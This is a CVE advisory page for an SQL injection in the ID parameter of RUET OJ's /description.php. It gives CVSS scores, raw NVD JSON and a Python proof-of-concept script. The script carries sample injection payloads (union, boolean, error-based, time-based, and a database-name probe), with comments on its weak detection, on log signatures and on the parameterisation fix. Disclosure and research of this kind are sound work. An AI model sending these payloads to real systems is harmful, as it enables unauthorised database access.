Security Vulnerability Report
CVE-2025-12327 CVSS 6.3 MEDIUM

CVE-2025-12327

Published: 2025-10-27 21:15:37
Last Modified: 2026-04-29 01:00:02

Description

A SQL injection vulnerability was found in shawon100 RUET OJ up to commit 18fa45b0a669fa1098a0b8fc629cf6856369d9a5. It affects unspecified processing in the file /description.php: manipulating the ID argument leads to SQL injection. The attack can be launched remotely. The exploit has been publicly disclosed and may be used. The product follows a rolling release model with continuous updates, so no specific version information is available for affected or fixed releases. The vendor was contacted early about this disclosure but did not respond in any way.

CVSS Details

CVSS Score
6.3
Severity
MEDIUM
CVSS Vector
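CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L
Note: this 6.3 score is the "Secondary" source assessment in the raw JSON below. The same record also carries a "Primary" CVSS 3.1 assessment of 6.5 MEDIUM (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N) and a CVSS 4.0 base score of 2.1 LOW, so check which source your tooling uses when prioritising.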

Configurations (Affected Products)

cpe:2.3:a:shawonruet:ruet_oj:*:*:*:*:*:*:*:* - VULNERABLE
shawon100 RUET OJ <= 18fa45b0a669fa1098a0b8fc629cf6856369d9a5

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests
import sys

# CVE-2025-12327 SQL Injection PoC for RUET OJ /description.php
# Target: shawon100 RUET OJ up to commit 18fa45b0a669fa1098a0b8fc629cf6856369d9a5
#
# Reviewer notes (what this script does and does not show):
# - It issues a single unauthenticated GET and prints the status code and
#   body length; nothing here inspects the response for evidence of
#   injection, so its output alone does not establish whether a deployment
#   is affected.
# - The advisory's CVSS vector lists PR:L, yet no session or credentials are
#   sent, which is a further reason to treat the output as inconclusive.
# - In web-server access logs the request appears as GET /description.php
#   with an ID value containing a single quote followed by SQL keywords
#   (UNION SELECT, EXTRACTVALUE, SLEEP, SUBSTRING) and the "-- -" terminator,
#   sent with the fixed User-Agent string defined below.
# - The advisory attributes the flaw to the ID argument reaching a SQL
#   statement; the server-side remedy for that class of bug is to bind ID as
#   a query parameter (or cast it to an integer) instead of concatenating it.


def exploit_sqli(target_url, payload):
    """Send one GET to /description.php with `payload` as the ID parameter.

    Args:
        target_url: Base URL of the deployment. The path is appended directly,
            so a trailing slash produces "//description.php".
        payload: Value sent as ID. The literal string 'auto' is replaced by
            the 'union_based' sample below.

    Returns:
        The response body as text, or None if the request raised a
        requests RequestException.
    """
    endpoint = f"{target_url}/description.php"

    # Generic sample strings, one per injection technique. Only 'union_based'
    # is ever read (for payload == 'auto'); the other three entries are unused.
    sample_payloads = {
        'union_based': "1' UNION SELECT 1,2,3,4,5-- -",
        'boolean_blind': "1' AND 1=1-- -",
        'error_based': "1' AND EXTRACTVALUE(1,CONCAT(0x7e,version()))-- -",
        'time_based': "1' AND SLEEP(5)-- -",
    }

    request_headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)',
    }

    if payload == 'auto':
        payload = sample_payloads['union_based']

    query = {'ID': payload}

    try:
        print(f"[*] Sending payload: {payload}")
        print(f"[*] Target: {endpoint}")

        resp = requests.get(
            endpoint,
            params=query,
            headers=request_headers,
            timeout=30,
        )

        # Only metadata is reported; the body is handed back unexamined.
        print(f"[+] Status Code: {resp.status_code}")
        print(f"[+] Response Length: {len(resp.text)}")

        return resp.text
    except requests.exceptions.RequestException as exc:
        print(f"[-] Error: {exc}")
        return None


def extract_data(target_url):
    """Send one boolean probe about the first letter of the database name.

    Not called from the entry point below. The success check only looks for
    the absence of the substring 'error' in the body, so any unrelated page
    that lacks that word (a login form, a redirect target, a custom 404)
    is reported as a match; the printed conclusion is not evidence.
    """
    probe = "1' AND SUBSTRING((SELECT database()),1,1)='r'-- -"

    print("[*] Attempting database enumeration...")
    body = exploit_sqli(target_url, probe)

    # Empty/None body, or a body mentioning 'error': nothing is reported.
    if not body or 'error' in body.lower():
        return

    print("[+] Database name likely starts with 'r'")


if __name__ == "__main__":
    if len(sys.argv) < 2:
        print("Usage: python cve-2025-12327.py <target_url> [payload]")
        print("Example: python cve-2025-12327.py http://target.com/ruet-oj")
        sys.exit(1)

    target = sys.argv[1]
    # The second argument is optional; 'auto' selects the union-based sample.
    payload = 'auto' if len(sys.argv) <= 2 else sys.argv[2]

    exploit_sqli(target, payload)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-12327", "sourceIdentifier": "[email protected]", "published": "2025-10-27T21:15:36.713", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was determined in shawon100 RUET OJ up to 18fa45b0a669fa1098a0b8fc629cf6856369d9a5. This issue affects some unknown processing of the file /description.php. This manipulation of the argument ID causes sql injection. The attack may be initiated remotely. The exploit has been publicly disclosed and may be utilized. This product uses a rolling release model to deliver continuous updates. As a result, specific version information for affected or updated releases is not available. The vendor was contacted early about this disclosure but did not respond in any way."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", 
"modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "baseScore": 6.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 8.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", 
"value": "CWE-74"}, {"lang": "en", "value": "CWE-89"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:shawonruet:ruet_oj:*:*:*:*:*:*:*:*", "versionEndIncluding": "2022-10-19", "matchCriteriaId": "A49CA863-91A0-43A6-81AF-E57886D0E879"}]}]}], "references": [{"url": "https://vuldb.com/?ctiid.330104", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.330104", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.674349", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}]}}